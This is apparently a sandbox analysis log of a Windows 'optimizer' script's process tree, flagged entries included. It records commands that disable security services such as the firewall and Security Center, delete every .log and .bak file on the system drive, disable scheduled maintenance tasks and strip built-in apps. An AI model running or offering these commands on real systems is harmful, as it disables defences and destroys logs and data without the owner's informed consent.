C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c rd /s /q C:\Windows\SoftwareDistribution
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c md C:\Windows\SoftwareDistribution
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintNotify" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintNotify" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c for /f %i in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc" ^| find /i "PrintWorkflowUserSvc"') do (reg add "%i" /v "Start" /t reg_dword /d "4" /f)
    C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc" | find /i "PrintWorkflowUserSvc"
        C:\Windows\system32\reg.exe   reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PrintWorkflowUserSvc"
        C:\Windows\system32\find.exe   find /i "PrintWorkflowUserSvc"
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintWorkflowUserSvc" /v "Start" /t reg_dword /d "4" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PrintWorkflowUserSvc_1a0b5" /v "Start" /t reg_dword /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InstallService" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InstallService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PushToInstall" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PushToInstall" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c for /f %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" ^| find /i "UnistoreSvc"') do (reg add "%I" /v "Start" /t reg_dword /d "4" /f)
    C:\Windows\system32\cmd.exe   C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" | find /i "UnistoreSvc"
        C:\Windows\system32\find.exe   find /i "UnistoreSvc"
        C:\Windows\system32\reg.exe   reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc"
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UnistoreSvc" /v "Start" /t reg_dword /d "4" /f
    C:\Windows\system32\reg.exe   reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UnistoreSvc_1a0b5" /v "Start" /t reg_dword /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSVC" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSVC" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VaultSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VaultSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\StorSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\StorSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f
        - Modifies security service
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mpssvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mpssvc" /v "Start" /t REG_DWORD /d "4" /f
        - Modifies security service
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UmRdpService" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UmRdpService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EntAppSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EntAppSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SessionEnv" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SessionEnv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\pla" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\pla" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TroubleshootingSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TroubleshootingSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WerSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WerSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DPS" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DPS" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\diagnosticshub.standardcollector.service" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\diagnosticshub.standardcollector.service" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DiagLog" /v "Start" /t "reg_dword" /d "0" /f
    C:\Windows\system32\reg.exe   reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DiagLog" /v "Start" /t "reg_dword" /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\WdiContextLog" /v "Start" /t reg_dword /d "0" /f
    C:\Windows\system32\reg.exe   reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\WdiContextLog" /v "Start" /t reg_dword /d "0" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d "0x33554432" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d "0x33554432" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SEMgrSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SEMgrSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DusmSvc" /v "Start" /t REG_DWORD /d "4" /f
    C:\Windows\system32\reg.exe   Reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DusmSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c del /s /f /q %SYSTEMDRIVE%\Windows\Temp\*.*
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\Windows\Temp
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c md C:\Windows\Temp
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c del /s /f /q %temp%\*.*
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c rd /s /q %temp%
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c md %temp%
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\Temp\*.*
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.log
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.bak
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c del /q /f /s %SYSTEMDRIVE%\*.gid
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierdaily" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierdaily" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierinstall" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\ApplicationData\appuriverifierinstall" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Device Information\Device" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\Device Information\Device" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /DISABLE
    C:\Windows\system32\schtasks.exe   schtasks /change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /DISABLE
C:\Windows\System32\cmd.exe   "C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /DISABLE
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\International\Synchronize Language Settings" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\International\Synchronize Language Settings" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\Installation" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\Installation" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\PushToInstall\Registration" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\PushToInstall\Registration" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Setup\SetupCleanupTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Setup\SetupCleanupTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsColorSystem\Calibration Loader" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsColorSystem\Calibration Loader" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\AppListBackup\Backup" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\AppListBackup\Backup" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Defrag\ScheduledDefrag" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Defrag\ScheduledDefrag" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Flighting\FeatureConfig\UsageDataReporting" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Flighting\FeatureConfig\UsageDataReporting" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Diagnosis\Scheduled" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Diagnosis\Scheduled" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\MemoryDiagnostic\RunFullMemoryDiagnostic" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\MemoryDiagnostic\RunFullMemoryDiagnostic" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg -import "C:\Users\Admin\AppData\Roaming\trampios\POWERX.pow" 55555555-5555-5555-5555-5555555555552⤵
-
C:\Windows\system32\powercfg.exepowercfg -import "C:\Users\Admin\AppData\Roaming\trampios\POWERX.pow" 55555555-5555-5555-5555-5555555555553⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg -setactive 55555555-5555-5555-5555-5555555555552⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exepowercfg -setactive 55555555-5555-5555-5555-5555555555553⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow" /ve /t REG_SZ /d "Power Plan" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\.pow" /ve /t REG_SZ /d "Power Plan" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow" /v "FriendlyTypeName" /t REG_SZ /d "Power Plan" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\.pow" /v "FriendlyTypeName" /t REG_SZ /d "Power Plan" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow\DefaultIcon" /ve /t REG_EXPAND_SZ /d "%%SystemRoot%%\System32\powercfg.cpl,-202" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\.pow\DefaultIcon" /ve /t REG_EXPAND_SZ /d "%C:\Windows%\System32\powercfg.cpl,-202" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow\shell\Import\command" /ve /t REG_SZ /d "powercfg /import \"%1\"" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\.pow\shell\Import\command" /ve /t REG_SZ /d "powercfg /import \"%1\"" /f3⤵
- Modifies registry class
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftSolitaireCollection*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftOfficeHub*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Office.OneNote*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Paint3D*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MSPaint*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftStickyNotes*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsAlarms*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsMaps*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.ZuneVideo*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.People*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
